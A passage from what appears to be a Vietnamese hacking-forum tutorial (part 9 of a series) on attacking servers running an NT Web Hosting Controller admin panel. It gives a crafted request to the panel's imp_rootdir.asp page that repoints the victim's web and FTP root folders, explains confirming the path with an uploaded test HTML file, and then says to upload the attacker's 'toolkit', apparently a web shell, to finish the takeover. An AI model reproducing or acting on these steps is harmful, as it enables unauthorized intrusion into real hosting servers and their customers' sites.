http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=Csmilie đường dẫn đến thư mục web victim )&owwwPa th=C:\&oftpPath=Csmilie đường dẫn đến thư mục ta vừa upload file )

+ Các bạn có thể test đường dẫn file up lên có chính xác không bằng cách up lên file a.html bất kỳ , giả sử nó được up lên nằm ở C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html ta sẽ test bằng cách đánh đường dẫn ở URL :

www.victim/admin[avdadmin]/a.html

+ Nếu như đúng là chính xác rồi thì chỉ cần up “Đồ nghề” lên là xong , .

----------------------------------------------------------------------------------------------

GOODLUCK!!!!!!!!!!!!!!!!!

( Hết phần 9 )
 
Go to Page:  First Page Page 11 12 13 14 Page 16 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|